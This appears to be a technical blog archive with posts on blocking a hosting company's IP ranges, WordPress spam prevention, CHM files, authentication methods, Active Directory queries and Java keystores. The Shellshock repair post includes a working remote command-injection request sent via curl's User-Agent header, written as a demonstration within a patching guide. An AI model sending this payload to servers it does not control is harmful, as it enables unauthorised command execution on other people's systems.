Blocking all BlazingFast IP address blocks (ranges)

Over the past few weeks, I’ve had some issues with my site sometimes being unavailable or loading very slowly. Checking on the server, I could see a high number of Apache processes and memory usage about 5 GB higher than usual. Running netstat, I could see many connections coming from the same IP address:

A whois on this address showed that the IP address belongs to a hosting company in Kiev, Ukraine called BlazingFast. I first blocked this single IP address using iptables:

/sbin/iptables -A INPUT -s <attacker IP address> -j DROP

Since I have a monitoring script checking for intrusion attempts and blocking IP addresses, I end up with lots of DROP rules in iptables, so once a week I clean them automatically. Hackers usually don’t keep trying for more than a week once they see that their traffic to my server is blocked anyway.
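The weekly cleanup boils down to turning the appended DROP rules into the matching delete commands. Here is a minimal sketch of that transformation, shown on a sample rule rather than on live iptables output (listing rules requires root); in the real script, the sample line would be replaced by the output of `/sbin/iptables -S INPUT`:

```shell
# Convert an appended rule ("-A", as printed by `iptables -S INPUT`) into the
# matching delete command ("-D") and prefix it with the iptables binary.
# 192.0.2.10 is just an example address from the IPv4 documentation range.
sample='-A INPUT -s 192.0.2.10/32 -j DROP'
cleanup_cmd=$(echo "$sample" | sed 's/^-A /-D /' | sed 's|^|/sbin/iptables |')
echo "$cleanup_cmd"
```

Piping the generated commands to `sh` (as root) actually removes the rules; running that from cron once a week matches the cleanup described above.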

Here it was different. As soon as the rules were cleared, it started again from the exact same address. Of course, I immediately blocked this IP address again and sent an email to their abuse address but, as expected, never got an answer. Instead, the same thing happened again from another, similar IP address; a whois showed that this address also belongs to the same Ukrainian hosting company.

So, since it was now clear that I’d keep having problems with IP addresses belonging to this company, I decided to block all traffic coming from the IP ranges they own. First I looked up their ASN: AS60033. Then I looked up the IP address blocks announced for this ASN.

Then all I had to do was use iptables to block traffic from these IP address blocks (and make sure that these rules stay in place):

/sbin/iptables -A INPUT -s <CIDR block> -j DROP

(repeat this rule once for each of the 18 IP address blocks belonging to the ASN)
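Rather than maintaining 18 hand-typed rules, the blocks can be kept in a plain text file (one CIDR range per line; `blazingfast.txt` is a hypothetical name) and loaded in a loop, which also makes it easy to re-apply them after the chain has been flushed. This sketch only prints the commands; drop the `echo` and run as root to actually apply them:

```shell
# Example ranges from the IPv4 documentation space, NOT the real BlazingFast
# blocks; replace the file contents with the ranges from the ASN lookup.
printf '192.0.2.0/24\n198.51.100.0/24\n' > blazingfast.txt
while read -r block; do
  [ -n "$block" ] && echo /sbin/iptables -A INPUT -s "$block" -j DROP
done < blazingfast.txt
```

To make the rules survive a reboot, they can be saved with `iptables-save` after loading.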

So now the load on the server is fine again and, unlike in the past few weeks, the hosted websites are always accessible and load fast.

It’s interesting to see that BlazingFast advertises a DDoS protection service on the one hand, yet seems to have customers performing brute-force attacks from their servers on the other. If you look up their ASN on the fail2ban reporting service, you will see that a few of their IP addresses are being blocked, so I am not the only one who’s been hit by this. Maybe they should not only focus on protecting their customers from DDoS attacks but should also prevent them from performing attacks.

This post on Stack Exchange also shows that this is nothing new: there were already attacks originating from one of their IP addresses in May. The answers to that post also give some alternative ways to block them, using the Apache .htaccess file, a Cisco firewall, Nginx, a Microsoft IIS Web Server rule, netsh AdvFirewall or the CSF firewall.

I know it’s more difficult to identify attacks originating from one of your own IP addresses than attacks targeting your network. As a hosting company, you definitely do not want too many false positives blocking legitimate traffic created by your customers. But I’m still pretty mad about having to waste so much time taking care of this kind of thing…

Update 18/07/2015: I’ve ended up also blocking all IP blocks of the following companies: ISPsystem, cjsc and Lekosport-Kharkov LLC, which were wasting my time with their attempts to hack wp-login.php.

Update 20/07/2015: Today I’ve blocked additional IP blocks belonging to Kyivstar PJSC. Slowly I’m starting to think that I’ll have to block access to complete regions in order to be able to sleep at night without worrying…

WordPress Spam Fighting

Until September 2014, I mostly relied on Akismet to prevent comment spam on my blog. But some time last summer, I noticed that there were actually quite a few spam comments which weren’t identified as such. The reason was that the total number of spam comments had reached about 1000 a day, so a few of them slipping through every day wasn’t much in relative terms. But it was still a pain to go through them, as I only checked comments once in a while.

So I decided to find out what methods I could use to prevent comment spam instead of relying only on Akismet. This led me to write a plugin called WP Spam Fighter.

In this plugin, I’ve implemented a few methods designed to address different vectors used to create comment spam.

Spam Bots vs. Normal Users

First, most comment spam is generated not by humans but by bots that post comments on thousands of sites. This makes them easier to trick: they are not designed to work around every possible detection trick but to create as many comments as possible on as many sites as possible.

So how do you identify spam bots?

Well, first you have to understand how to identify a normal user:

  1. A normal user sees a rendered web page and not only the HTML code.
  2. A normal user actually reads your posts.
  3. A normal user also understands the fields contained in a comment form.

You should also note that the second characteristic of normal users also differentiates them from human spammers: human spammers do see a rendered site and do understand the comment form fields, but they do not actually read your post.

OK, so now that we know how to identify a normal user, how do we use this knowledge to stop comment spam?

A normal user sees a rendered web page

This basically means that a normal user will only fill in form fields which are actually visible on the rendered page. Spam bots fetch the HTML code and do not apply any CSS styles. So if you add a field to the form and make it invisible, normal users will not fill it in but spam bots might.

This leads us to a spam-fighting method usually called a honeypot. Spam bots will usually go through all fields in the form and try to put some value in each (since they do not know which fields are mandatory and which are optional).

The more the additional field looks like a normal form field, the better the chances that even a half-intelligent spam bot will not identify it as a honeypot.
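The plugin itself is written in PHP; the following language-agnostic sketch (in shell, with a hypothetical `check_comment` helper) just illustrates the server-side half of the honeypot logic:

```shell
# Reject a comment whenever the hidden honeypot field arrives non-empty.
# A human never sees the field, so it stays empty; most bots fill every field.
check_comment() {
  honeypot_value=$1
  if [ -n "$honeypot_value" ]; then
    echo "rejected (honeypot filled: likely a bot)"
  else
    echo "accepted"
  fi
}
check_comment ""                      # human: hidden field left empty
check_comment "http://spam.example"   # bot: filled in the invisible field too
```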

A normal user actually reads your posts

Spam bots as well as human spammers do not actually care about the contents of your post. There is almost no targeted spam which makes sure that the spam comments are added to a post actually related to them. So even human spammers will just scroll down to the bottom of the post and enter some text in the form fields. Their goal is to produce as much spam as possible in the shortest period of time, so chances are they will spend as little time as possible on your page.

So a way to fight both human spammers and spam bots is to make sure that a comment can only be posted after the user has spent a certain amount of time on your page. How long this is basically depends on the type of content you have on your page. If you just post short jokes, it could be that a legitimate user posts a smiley as comment after only 20 seconds on your page. If you have long and complex articles on your site, the chances are that nobody will comment on your posts without spending at least a minute on the page.

This spam protection mechanism can be implemented by adding some JavaScript code which returns an error message when you try to submit a comment too early. Of course, anything which resides purely on the client side is out of your control and can be circumvented by a spammer. That’s why you also need a check in the backend making sure that the JavaScript check has run (e.g. by adding data to the form before posting it).
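Again, the real implementation is PHP plus JavaScript; this shell sketch only illustrates the backend side of the time check, with the rendering timestamp simulated instead of coming from the submitted form:

```shell
MIN_SECONDS=30                          # minimum time on page before commenting
ts_from_form=$(( $(date +%s) - 45 ))    # simulated: page was rendered 45s ago
now=$(date +%s)
if [ $(( now - ts_from_form )) -lt "$MIN_SECONDS" ]; then
  decision="rejected: comment submitted too quickly"
else
  decision="accepted"
fi
echo "$decision"
```

A real implementation must also sign or obfuscate the timestamp, since anything the client sends back can be forged.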

A normal user also understands the fields contained in a comment form

Of course, a human spammer also does, so developing a spam protection mechanism based on this will only help against spam bots not specifically targeting your site.

This just involves adding a form field and expecting a given value. Its simplest form is a checkbox labelled “I am NOT a spammer”; the most complex form is some kind of captcha. Since I hate captchas, I’ve only implemented the simple checkbox option in my plugin. It’s not much additional work for a legitimate user and will still block stupid spam bots.

In addition to this (or as an alternative), you can also implement a second, similar mechanism: automatically adding some kind of token to a form field using JavaScript when the form is submitted. In the backend you then check for the presence of this token. Spam bots usually do not run JavaScript code on your page, so they will submit the form without the token.

Additional ways to identify legitimate users

If you want to make 100% sure that you do not get comment spam, there are a few additional methods you can use to prevent spam:

  1. Check whether a gravatar is associated with the provided email address
  2. Only allow registered users to comment
  3. Completely disable commenting

Of course, for a blog, I wouldn’t recommend disabling comments, as they are often valuable input both for you and for your visitors. Also, many spam-fighting mechanisms make life more difficult for legitimate visitors who want to comment on a page. I personally hate captchas, and every time I get a captcha wrong on the first try, or get a text I can hardly read, I just move away.

So forcing users to have a gravatar or to register in order to comment could reduce the number of visitors who will actually take the time to post a comment.


Many of the mechanisms presented in this article are fairly simple and not at all bullet-proof. A human spammer would be able to work around them all, and it would also be possible to create a spam bot that works around them. What you need to keep in mind is:

  • Spam is usually not targeted. The spam comments you get are posted on millions of sites.
  • The goal of spammers is to get through with the least effort.

This basically means that even though a spammer might implement a bot to work around these mechanisms, why should he waste his time? There are millions of sites out there and yours is only one of them. Even spending an hour implementing a way around your spam protection would be a waste of time.

So, of course, a human spammer could wait 30 seconds before posting a comment on your site. But instead of spending 5 minutes posting 10 spam comments on your site, it makes more sense for him to post 30 spam comments on other sites which don’t have this kind of protection.

On this site, I’ve configured the WP Spam Fighter plugin with the following mechanisms enabled:

  • Time based protection
  • Honeypot protection
  • “Not a spammer” checkbox
  • JavaScript human check

And the results are not bad. After switching from Akismet to this plugin, the number of spam comments which got through dropped from 1 or 2 a day to 1 or 2 a month. Since I still get a spam comment every 5 minutes (automatically marked as spam by the plugin) and I only check the spam folder once in a while, it’s difficult to say whether there are any false positives. But there should not be any, since none of these mechanisms interprets the comment data to identify spam. Moreover, the number of comments I get on the site didn’t change after introducing the plugin.

And the great advantage over Akismet is that this plugin doesn’t need to store or transmit any data related to the visitors of this site, which can be a problem in some countries.

Windows 7: empty pages displayed in CHM file

When opening a CHM file downloaded from the Internet on a Windows Vista or Windows 7 machine, the file may not render properly and just show empty pages. No matter which page you select, all you’ll see is an error message saying “Navigation to the webpage was canceled”, e.g.:

Navigation to the webpage was canceled

The problem is that the file comes from another computer and is blocked. It’s strange because you actually get a security warning when opening the file, and one would expect that if you open it anyway, everything should be fine. Here is an example of such a security warning:

Open File - Security Warning

The solution is to unblock the file. In order to do so, do not open the file directly from the browser but save it to disk, then right-click on the file, choose Properties and unblock it:

CHM file properties - Unblock

Now, when you open the file, no security warning will be displayed and the contents will be displayed properly.

Note that you should only unblock files that you trust.

If you do not see an Unblock button, either you have already unblocked it and it doesn’t work anymore (not exactly sure when this happens), or you might have stored the file on a file system which doesn’t support the Unblock feature (it looks like it only works on NTFS).

You can also implicitly unblock the file by unchecking “Always ask before opening this file” in the security warning shown above.

So this whole behavior doesn’t seem very consistent, but fixing it was pretty straightforward.

Update: It looks like on Windows 8, you can unblock files from PowerShell using the following cmdlet:

Unblock-File .\SshNet.Help.chm


Fixing the Shellshock GNU bash shell vulnerability

What’s shellshock?

Shellshock (also known as Bashdoor) is a vulnerability in the GNU Bash shell which allows an attacker to run remote commands on your system. It affects Bash versions 1.13 to 4.3. In the past few days, botnets have used compromised computers for distributed denial-of-service (DDoS) attacks and vulnerability scanning.

Bash is installed as the default command-line interface on many Unix-based systems. It is used to interpret commands and is itself a command which can be executed. As such, it has both a list of environment variables and a list of internal functions, and when launching a new Bash interpreter, a list of environment variables and functions can be exported to the new process. This vulnerability causes Bash to execute commands stored in environment variables in a special format: when a newly started instance of Bash scans its environment variables for values which should be converted to internal functions, the affected versions create fragments of code on the fly and execute them without checking whether the fragments are only function definitions. Using this vulnerability, an attacker can execute arbitrary commands.

How to check whether you are affected?

In order to check whether your system is affected you can execute the following from a shell:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the output contains “vulnerable”, you are affected. Otherwise, the patch for Bash has already been installed (but keep in mind that there are different ways to exploit this vulnerability, and even if this check is negative, it’s safer to update to newer versions of Bash as they are released).
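If you want to run the check on several machines, it can be wrapped in a small script; note that this sketch only tests the original CVE-2014-6271 vector, not the follow-up variants:

```shell
# Run the classic Shellshock test in a child bash and report the result.
out=$(env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 2>/dev/null)
case "$out" in
  *vulnerable*) status="VULNERABLE to CVE-2014-6271" ;;
  *)            status="appears patched against CVE-2014-6271" ;;
esac
echo "bash $status"
```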

Your server is not only vulnerable when spawning a Bash instance from the command line but also when Apache is used in combination with mod_cgi and spawns either a Bash shell or anything else (e.g. a Perl script) which executes commands and passes environment variables.

A few examples are:

  • A Perl script using the built-in functions exec or system to invoke a new shell process
  • A PHP script using the built-in functions exec or system to invoke a new shell process
  • A Python script using os.system or os.popenx (depending on how it is called)

Note that an attack on CGI scripts will only work if Bash is used as the default shell.

Just to show you how easy it is to use this vulnerability against a server running Apache, mod_cgi and some CGI scripts spawning a shell:

curl "https://<your-server>/cgi-bin/<some-script>" --insecure -H "User-Agent: () { :; }; echo 'Hello Server' > /tmp/shellshock.log"

This will return some HTML code and will create a file /tmp/shellshock.log on the affected server.
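For context, the CGI script being attacked does not need to do anything special. Something as trivial as the following (a hypothetical /cgi-bin/test.sh) is enough on an unpatched system, because mod_cgi exports request headers such as User-Agent into the script’s environment (as HTTP_USER_AGENT) before Bash even runs the first line:

```shell
#!/bin/bash
# Minimal CGI script: prints a header and a body. The vulnerability triggers
# while bash imports the environment, before any of these lines execute.
echo "Content-type: text/plain"
echo ""
echo "Hello from CGI"
```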

How to fix it?

In most systems, it’s as easy as installing the latest Bash update. On Debian, Ubuntu and other systems using apt-get:

apt-get update && apt-get upgrade

On Red Hat, Fedora, CentOS and other systems using yum:

yum -y update bash

On Arch Linux:

pacman -Syu


On SUSE systems using zypper:

zypper ref -s
zypper up bash

SUSE Linux Enterprise Server

Note that updates for SLES are only available for LTSS versions and for SLES 11 SP3. If you are running an older non-LTSS version of SLES, you’ll have to install Bash from source as described below. Here is the list of SLES versions for which an update is available:

  • SUSE Linux Enterprise Server 10 SP3 LTSS
  • SUSE Linux Enterprise Server 11 SP2 LTSS
  • SUSE Linux Enterprise Server 11 SP1 LTSS
  • SUSE Linux Enterprise Server 10 SP4 LTSS
  • SUSE Linux Enterprise Server 11 SP3

Red Hat Enterprise Linux

RHEL updates are available for the following versions:

  • Red Hat Enterprise Linux 4 Extended Lifecycle Support
  • Red Hat Enterprise Linux 5
  • Red Hat Enterprise Linux 5.6 Long Life
  • Red Hat Enterprise Linux 5.9 Extended Update Support
  • Red Hat Enterprise Linux 6
  • Red Hat Enterprise Linux 6.2 Advanced Update Support
  • Red Hat Enterprise Linux 6.4 Extended Update Support
  • Red Hat Enterprise Linux 7

Mac OS X

Apple has released updates for Mac OS X Lion, Mountain Lion and Mavericks. Make sure you install these updates, even though Apple has argued that most Mac OS X users are not exposed unless they have configured advanced UNIX services. Since most Mac OS X users do not run a web server, the risk of having this vulnerability exploited is not as high as for Unix-based web servers accessible from the internet, but you do not want to risk anything, especially when the fix is as easy as updating your software (which should be done on a regular basis anyway).

How to install from source?

Latest Bash version (4.3)

If no update is available for your system (e.g. because you’re on an older version), you’ll have to download Bash 4.3, apply all patches, compile and install it. If you have direct internet access from your machine, do the following:

cd /tmp
mkdir bash
cd bash
wget https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
for i in $(seq -f "%03g" 1 27); do wget https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
tar zxvf bash-4.3.tar.gz 
cd bash-4.3
for i in $(seq -f "%03g" 1 27);do patch -p0 < ../bash43-$i; done
./configure && make && make install

If there are more than 27 patches for Bash 4.3 by the time you read this, replace both occurrences of 27 with the appropriate number.

If you do not have direct internet access from the machine, you’ll have to download Bash 4.3 and all patches elsewhere and then copy them via (S)FTP to /tmp/bash. Then, from /tmp/bash:

tar zxvf bash-4.3.tar.gz 
cd bash-4.3
for i in $(seq -f "%03g" 1 27);do patch -p0 < ../bash43-$i; done
./configure && make && make install

Note: If the files are renamed to bash43-0xx.txt when downloading, you’ll have to remove the .txt extension. And change 27 to the current number of patches for Bash 4.3.

Also note that Bash will be installed in /usr/local/bin/bash. You will then need to make sure that the old bash is removed and replaced by a symlink to the new one:

cd /bin; rm bash; ln -s /usr/local/bin/bash

(thanks Gerhard for the hint)

Older Bash version (e.g. 3.2)

If you’re using an older version of Bash (e.g. because you’re running SLES 11 SP1), you might want to only update Bash to the latest update within the same version.

First create the working directory /tmp/bash using: mkdir /tmp/bash

Download bash-3.2.48.tar.gz from the GNU FTP server instead of the 4.3 package; this tarball already includes the patches up to patch 48. Additionally, download patches 49 to 54 from the bash-3.2-patches directory on the same server.

Note: If the files are renamed to bash32-0xx.txt when downloading, you’ll have to remove the .txt extension.

Upload all downloaded files to /tmp/bash. Go to /tmp/bash using: cd /tmp/bash and execute the following:

tar zxvf bash-3.2.48.tar.gz 
cd bash-3.2.48/
for i in $(seq -f "%03g" 49 54);do patch -p0 < ../bash32-$i; done
./configure && make && make install

Change 54 to the current number of patches for Bash 3.2.

Also note that this uses the patch command. If it is not installed, you’ll have to install it, or perform all steps except the last one on a machine where patch is installed and then copy the resulting folder to the target machine before executing the last command. Before executing this last command, you might need to add execute permission to the configure file:

chmod +x configure

If you get the following error message during the install step:

/home/install -m 0755 bash /usr/local/bin/bash
make: execvp: /home/install: Permission denied
make: *** [install] Error 127

You will have to execute the following:

install -m 0755 bash /usr/local/bin/bash

Note that Bash will be installed in /usr/local/bin/bash. You will then need to make sure that the old bash is removed and replaced by a symlink to the new one:

cd /bin; rm bash; ln -s /usr/local/bin/bash

(thanks Gerhard for the hint)


I’ve noticed that with the new version of Bash there may be some issues when setting LD_LIBRARY_PATH before starting some software. You should actually not be using LD_LIBRARY_PATH on a production system anyway, but rather rely on ldconfig. To do so, add all directories containing shared libraries to /etc/ld.so.conf (or a file under /etc/ld.so.conf.d/) and execute the following:

ldconfig -v

This way you make sure that even with an updated version of Bash your software will find the shared libraries without issues.
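For example (a sketch, assuming root; /opt/myapp/lib and the file name myapp.conf are hypothetical):

```shell
# Register the library directory system-wide instead of exporting LD_LIBRARY_PATH.
echo "/opt/myapp/lib" > /etc/ld.so.conf.d/myapp.conf
# Rebuild the linker cache so the new directory is picked up:
ldconfig
```

On systems without an /etc/ld.so.conf.d directory, append the path to /etc/ld.so.conf directly.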


Authentication Strategies


Authentication is the process of checking the identity of a person. There are many different ways to do it, both in the digital and the analog world. All these possibilities rely on some knowledge about the person. This is of course a recursive problem, since the validity of this knowledge is very often based on information gathered by a system or a person which itself needs to be authenticated. But unless you want to end up with a chicken-and-egg dilemma, at some point you’ll need to define a root assumption which you consider true in order to base a chain of authentication on it.


In a computer system, the most obvious approach is to use a password to authenticate a user and to make sure that the user is properly identified when this password is created. Additionally, you need to ensure that the password cannot be guessed by a third party (or that it is prohibitively complex to guess) and that the password is kept in storage which is itself safe (e.g. only in the memory of the user herself).

Meanwhile, in a world where most people need to authenticate in multiple places and systems on a daily or hourly basis, it has become obvious that an approach based solely on passwords, and the hope that these passwords are safely stored, is not sufficient to ensure safe authentication. First, a password is stored not only in the memory of its owner but also in every system which receives it to authenticate a user (of course, passwords shouldn’t be stored in a form which allows a third party to read them directly, but even encoding them with a one-way hashing mechanism doesn’t mean nobody will be able to recover them). Moreover, since a single person needs to authenticate in many different systems, users tend to use the same password in multiple systems; once a single system is compromised, the authentication of these users is compromised in many other systems.

In the past, one kind of solution to this problem has been to use a password store. For each system needing to authenticate you, a unique password is generated, usually a very strong one. Since such passwords are difficult to remember, it’s not the person who remembers them but a password store which keeps them and provides them on demand. Of course, this only moves the problem to another location: you no longer have a problem with weak passwords or password reuse, but you now have a problem protecting the password store and making sure that only the person owning the passwords can access them. This is again an authentication problem and is usually solved by using a password to secure the password store. Back to square one…


Apart from passwords, there are many other options for identifying a user. Some of them are used instead of password authentication, others in addition to it, implementing two-factor authentication. The logic behind this is that even if two authentication mechanisms are not strong enough by themselves, their combination makes it exponentially more difficult to break the authentication. Of course, this only works if the two mechanisms are based on two completely different concepts, making it difficult to circumvent them both.


Some authentication mechanisms rely on special knowledge unique to the person being identified. Once the person has been authenticated for the first time (whether through registration or personal identification on site), the system needs to gather some information that is known only to this person. This is most easily done by collecting facts about the person and her life. A single piece of information is definitely not enough, but a combination of them can prevent most people from guessing their way through the authentication process. The problem is that there is usually still a circle of people who know the person to be authenticated well enough to have the same knowledge. It is then a matter of reducing this circle to a minimum on the one hand, and of assessing whether the persons in this circle can be trusted on the other.

In summary, although the effort required to implement such a mechanism is relatively low, it does not provide a high level of security. This is the reason why this kind of mechanism is usually not used for primary authentication but rather for side processes like resetting a password. Even if someone guesses the name of your best friend in primary school, all they would achieve is to have an email sent to you, and they would still need to hack your email account in order to use it.


What’s more unique to a person than her own body? That’s the reason why a wide range of biometric authentication mechanisms have been implemented, encompassing fingerprints, facial recognition, retina recognition, voice recognition, hand/palm geometry and more. Fingerprint authentication is the most widely used biometric mechanism: a fingerprint is small enough that it can be read on a smartphone, a mouse, a keyboard, an external hard drive, a flash drive or other small reading devices, and fingerprint readers are relatively cheap.

This kind of authentication has been widely advertised by spy movies. A few decades ago, the technology was still too expensive for the mass market. But with lower costs, we are starting to see more widely available systems using this type of authentication.

Security tokens

The idea behind security tokens is that instead of identifying a person, you can identify a device you know only the person to be authenticated has access to. This security token can be anything which can be uniquely identified and is difficult (or ideally impossible) to forge. Since making devices which cannot be forged is virtually impossible and making devices which are very difficult to forge is expensive, this kind of authentication is best used in combination with another mechanism, e.g. by storing information on the security token which can only be read when using some other authentication mechanism like a PIN or a password.

An example of such a security token is a smart card. They are cheap, small in size and a widely used authentication mechanism. Using them requires a card reading device. This additional requirement makes them unsuitable for authentication on some platforms. Reading the card can be done either through contact with electrical connectivity pads (for contact smart cards) or through RF induction (for contactless smart cards).

Very often, smart cards are combined with a digital certificate infrastructure based on a public key infrastructure (PKI). See below for more information on digital certificates.

Some USB devices can also be used for authentication purposes. They are basically very similar to smart cards. They contain some authentication information which is transmitted to the computer through a USB port. They share the same issue as smart cards (not being usable in all environments) but bring the additional problem that they are not as easy to fit in your pocket/wallet as smart cards. An alternative to USB devices are Bluetooth devices (or Bluetooth enabled USB devices) which do not require a USB port and are thus usable on a wider range of devices.

Another example is a disconnected token displaying some generated authentication data which can be entered by its owner into another system. The generation pattern for the data displayed by these devices should be such that it is almost impossible to figure it out and guess the next generated data.

Of course, now that a large portion of the population in many markets has a smartphone in their pocket, solutions turning your smartphone (or tablet computer) into a security token seem to be a good solution. This doesn’t require you to carry around an additional device which serves no other purpose than authentication.

One-time security tokens

These are security items created for one-time use. Once they have been used, they are no longer valid and another one has to be used for the next authentication. Since they are valid only for a single use, the negative impact of one of them being compromised is limited. When using such an authentication mechanism, it is very important to secure the delivery of these tokens to your users: if the delivery mechanism itself is compromised, this mechanism will not provide more security than multiple-use security items.

Examples of this are one-time passwords generated on demand and sent to your email account (possibly in an encrypted email), or a list of indexed one-time passwords as used for online banking.
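Such an indexed list is easy to generate; here is a toy sketch (not a production TAN generator, which would also need to store and verify the values server-side):

```shell
# Print an indexed list of 10 random 12-hex-character one-time passwords.
for i in $(seq 1 10); do
  printf "%02d  %s\n" "$i" "$(head -c 6 /dev/urandom | od -An -tx1 | tr -d ' \n')"
done
```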

One-time security tokens can also be images or messages transported through alternative mechanisms e.g. to your cell phone or other devices.

Digital certificates

Digital certificates are digital identifying information, usually containing some additional information like serial numbers, expiration dates and public keys, and are digitally signed by a trusted certificate (which allows the creation of an authentication chain). Root certificates (certificates at the root of an authentication chain) are usually distributed with operating systems, browsers and other systems whose sources are secured.
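You can inspect exactly these fields with the openssl command-line tool. This sketch creates a throwaway self-signed certificate (all names and paths are just examples) and prints its subject and validity dates:

```shell
# Generate a short-lived self-signed certificate for demonstration purposes.
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/demo-key.pem \
  -out /tmp/demo-cert.pem -days 1 -subj "/CN=example.test" 2>/dev/null
# Print identifying information and the expiration dates mentioned above.
openssl x509 -in /tmp/demo-cert.pem -noout -subject -dates
```

A real certificate would of course be signed by a trusted CA rather than by itself; `openssl verify -CAfile …` is what checks such a chain.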

Additional checks

In addition to all these different types of authentication, you can also combine an authentication mechanism with a mechanism which checks the plausibility of the authentication. This can be done by checking some facts about the context of the authentication, e.g. geolocation, the IP address used, or the date/time (e.g. whether the user has already checked out from work or is on vacation)…

Making the system available only in a secured environment also works as a second factor. You can, for example, only allow access to a system through a VPN connection and not directly over the internet; you are then checking both that the user can connect through the VPN and her password. Of course, if the authentication required to access the login page is the same as the one used on the login page itself, this won’t increase the security of your application. Even if these checks are not used to reject authentication but only to detect a potential breach and have it reviewed, they are already very useful, as they limit the impact of a breach.

A few last words

Authentication is not limited to validating passwords. There is a wide range of possibilities for verifying the identity of a person. Some of them have existed for a very long time (like checking a passport or an ID). Some have been around for some time too but are only now becoming accessible to the wider masses (e.g. biometric mechanisms). Authenticating oneself is not something people usually enjoy, especially when it has to be done many times a day. This is the reason why single sign-on has become so popular and so important. But one has to keep in mind that reusing an authentication done by a third party is a matter of trust. If the security level of this third party is not sufficient, you’re opening your system/application to security breaches.

Authentication is always based on some assumptions as to which data can securely be used to identify a person. But these assumptions are only as good as the measures in place to ensure the validity and security of these data. Checking something delivered to a person is only safe if it cannot be guessed and if the delivery to the person is also secure.

Using a combination of unrelated authentication mechanisms is always safer than relying on only one of them. How good the combination is depends on how different they are. Checking two different passwords stored in the system might not provide more security. But checking a fingerprint and a digital certificate will provide a pretty strong security mechanism.

This article addresses a few authentication mechanisms which probably cover a large part of what’s being used out there. But there are many more mechanisms, and some of them might prove to be better alternatives in the future. Also, some of the mechanisms discussed here might seem secure with our present knowledge but prove insecure in the future. The only way to keep providing secure authentication for your users is to stay informed, learn about the weaknesses of existing authentication means and evaluate new authentication mechanisms.

C#: Query active directory to get a user’s roles

There are a few different ways to get the roles/groups of a user from Active Directory. Here are three of them.

The first way to do it is to use UserPrincipal.FindByIdentity:

private static IEnumerable<string> GetGroupsFindByIdentity(string username, string domainname, string container)
{
	var results = new List<string>();
	using (var context = new PrincipalContext(ContextType.Domain, domainname, container))
	{
		try
		{
			UserPrincipal p = UserPrincipal.FindByIdentity(context, IdentityType.SamAccountName, username);
			if (p != null)
			{
				var groups = p.GetGroups();
				foreach (var group in groups)
					results.Add(group.Name);
			}
		}
		catch (Exception ex)
		{
			throw new ApplicationException("Unable to query Active Directory.", ex);
		}
	}

	return results;
}

You can then print the roles using:

var groups = GetGroupsFindByIdentity("benohead", "", "DC=aw001,DC=amazingweb,DC=de");
foreach (var group in groups)
	Console.WriteLine(group);

Another way to do it is to use a DirectorySearcher and fetching DirectoryEntries:

private static IEnumerable<string> GetGroupsDirectorySearcher(string username, string container)
{
	var searcher =
		new DirectorySearcher(new DirectoryEntry("LDAP://" + container))
		{
			Filter = String.Format("(&(objectClass=user)(samaccountname={0}))", username)
		};

	// SearchResultCollection is non-generic, hence the Cast
	var directoryEntriesFound = searcher.FindAll()
		.Cast<SearchResult>()
		.Select(result => result.GetDirectoryEntry());

	foreach (DirectoryEntry entry in directoryEntriesFound)
	{
		foreach (object obj in (object[]) entry.Properties["MemberOf"].Value)
		{
			string group = Regex.Replace(obj.ToString(), @"^CN=(.*?)(?<!\\),.*", "$1");
			yield return group;
		}
	}
}
The regular expression is required in order to extract the CN part of the returned string.

var groups = GetGroupsDirectorySearcher("benohead", "DC=aw005,DC=amazingweb,DC=de");
foreach (var group in groups)
	Console.WriteLine(group);

The third way to do it is to use a WindowsIdentity:

private static IEnumerable<string> GetGroupsWindowsIdentity(string userName)
{
	var results = new List<string>();
	var wi = new WindowsIdentity(userName);

	if (wi.Groups != null)
		foreach (var group in wi.Groups)
			try
			{
				results.Add(group.Translate(typeof (NTAccount)).ToString());
			}
			catch (Exception ex)
			{
				throw new ApplicationException("Unable to query Active Directory.", ex);
			}

	return results;
}

You can then print the roles using:

var groups = GetGroupsWindowsIdentity("benohead");
foreach (var group in groups)
	Console.WriteLine(group);

You might notice that this last option seems to return more groups than the other two. I’m not yet sure why. I’ve tested it with multiple users and saw that it does return different groups, but for some reason it also returns groups not returned by either of the other methods. So for now I’d rather stick to the first or second method.

Java: Importing a .cer certificate into a java keystore

First let’s have a short look at what those certificates are and what you need them for. A certificate is basically a public key together with some additional identification information (e.g. country, location, company…). The certificate is signed by a Certificate Authority (CA) which guarantees that the information attached to the certificate is true. The .cer files are files containing a certificate.

In addition to the certificate, you also need a private key. The receiver of the certificate will use the public key in the certificate to decipher the encrypted text you are sending, which you encrypted using the corresponding private key. The public key in the certificate is publicly available, but you are the only one with access to the private key (that’s why the keystore containing your private key is protected by a password). This allows everybody to check whether sent information really comes from you.

While developing your software you will most probably be working with self-generated certificates. These certificates do not allow the client application to check whether you are really who you say you are, but they allow you to test most certificate-related functionality. You can generate such a certificate like this:

$JAVA_HOME/bin/keytool -genkey -alias ws_client -keyalg RSA -keysize 2048 -keypass YOUR_KEY_PASSWORD \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -dname "cn=YOUR_FQDN_OR_IP, ou=YOUR_ORG_UNIT, o=YOUR_COMPANY, c=DE" \
         -validity 3650 -J-Xmx256m

Note that the backslashes you see in there are only required so that this command is recognized as a multiline command. If you write it all on one line, you won’t need them.

The certificate generated above is valid for almost 10 years (3650 days).

The -J parameter is just there so that you do not get the following error when invoking keytool:

Error occurred during initialization of VM
Could not reserve enough space for object heap
Could not create the Java virtual machine.

Now, when you go into production, you’ll want to have a “real” certificate so that your users do not get more or less scary messages saying that your identity cannot be verified (i.e. has not been created by a trusted certificate authority). You’ll have to buy such a certificate or have your customer generate one if they can.

This is how you can display the certificates currently installed in your keystore:

$JAVA_HOME/bin/keytool -list \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

It will return something like:

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

ws_client, Apr 9, 2014, PrivateKeyEntry,

Certificate fingerprint (MD5): 4A:B5:07:64:A3:FF:16:E4:B9:28:A3:D9:BE:9D:7D:E6

You can export this certificate like this:

$JAVA_HOME/bin/keytool -exportcert -rfc -alias ws_client -file CER_FILE_PATH \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

